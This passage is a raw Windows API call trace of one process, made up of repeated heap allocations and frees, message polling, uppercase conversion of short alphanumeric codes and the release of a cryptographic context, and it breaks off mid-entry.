[0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.267] CryptDestroyKey (hKey=0xaa5760) returned 1 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.268] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.268] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.268] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.268] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.268] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.268] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.268] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.269] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.269] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.269] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.269] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.269] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.269] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.270] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.270] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.270] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.270] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.270] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.270] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.270] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.270] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.270] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.271] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.271] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.271] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.271] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.271] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.271] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.271] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.271] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.271] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.271] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.271] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.272] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.272] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.272] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.272] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.272] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.272] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.272] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.272] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.272] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.272] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.272] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.272] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.272] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.272] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.272] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.273] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.275] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.275] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.275] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.275] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.275] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.276] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.276] FreeLibrary (hLibModule=0x74d40000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.276] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.276] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.277] CloseHandle (hObject=0x268) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.280] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 